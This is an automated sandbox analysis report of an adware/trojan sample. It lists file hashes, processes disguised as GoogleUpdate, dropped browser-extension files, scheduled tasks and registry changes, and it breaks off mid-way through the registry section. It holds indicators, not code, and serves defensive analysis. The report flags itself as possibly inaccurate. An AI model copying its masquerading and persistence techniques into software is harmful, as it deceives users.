not-a-virus:AdWare.NSIS.Adwapper.cd (Kaspersky), Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 33f4c0b6bc10c582d33ea7f8431b8c85
SHA1: 59d908a83367fb69ee4853ff33c83333deca5bb6
SHA256: cbc1dbbc5607c23186b73e5cb13b979ab668d403308b48fd9bf8342860958a37
SSDeep: 196608:q3t6ahuiKVf6FkqPgGczMsCAsRG7jEik/Ce3e4sP/fbSUTcRyQvCrvH:q3tBwiofwVYGodjFIBDUTcPq7H
Size: 11336880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
GoogleUpdate.exe:1300
GoogleUpdate.exe:1220
GoogleUpdate.exe:1272
GoogleUpdate.exe:3944
GoogleUpdate.exe:476
GoogleUpdate.exe:2032
GoogleUpdate.exe:1936
17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
winservice86-bg.exe:2952
winservice86-codedownloader.exe:2888
winservice86-codedownloader.exe:2796
regsvr32.exe:2472
%original file name%.exe:1332
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process GoogleUpdate.exe:1272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)
The process GoogleUpdate.exe:2032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)
The Trojan deletes the following file(s):
%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{802A0BF3-D6B3-4F6C-B8D7-B6C3243887F5}-setup.exe (0 bytes)
%Program Files%\globalUpdate\Update\Install (0 bytes)
The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)
The process winservice86-codedownloader.exe:2888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)
The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
%Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
%Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
%Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
%Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
%Program Files%\winservice86\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\winservice86\winservice86.ico (9 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
%WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
%Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
%Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
%Program Files%\winservice86\utils.exe (76825 bytes)
%WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
%Program Files%\winservice86\Uninstall.exe (601 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (0 bytes)
%WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (0 bytes)
%WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (0 bytes)
%WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (0 bytes)
Registry activity
The process GoogleUpdate.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 30 68 94 0B 1C F4 87 36 47 06 A6 66 63 A0 D0"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
